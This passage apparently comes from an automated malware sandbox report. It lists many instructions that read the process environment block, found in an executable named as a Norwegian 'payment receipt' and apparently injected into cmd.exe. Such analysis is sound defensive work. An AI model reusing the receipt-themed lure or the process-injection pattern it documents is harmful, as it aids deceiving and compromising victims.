          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A38A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00969240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00969240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00969240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00969240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A2EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A35BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00992397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00971B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00971B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A1D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A2138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00994BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00994BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00994BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0098DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A2131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00993B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00993B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A38B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0097849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A38CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0098746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00992581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00992581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00992581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00992581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00991DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00991DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00991DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A18DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0097D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0097D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A38D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A2E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00994D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00994D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00994D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00987D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0098C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0098C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A1FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A38ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00998E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002CB5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CCFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CDEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CCFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CCD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02CAFF10 mov eax, dword ptr fs:[00000030h]
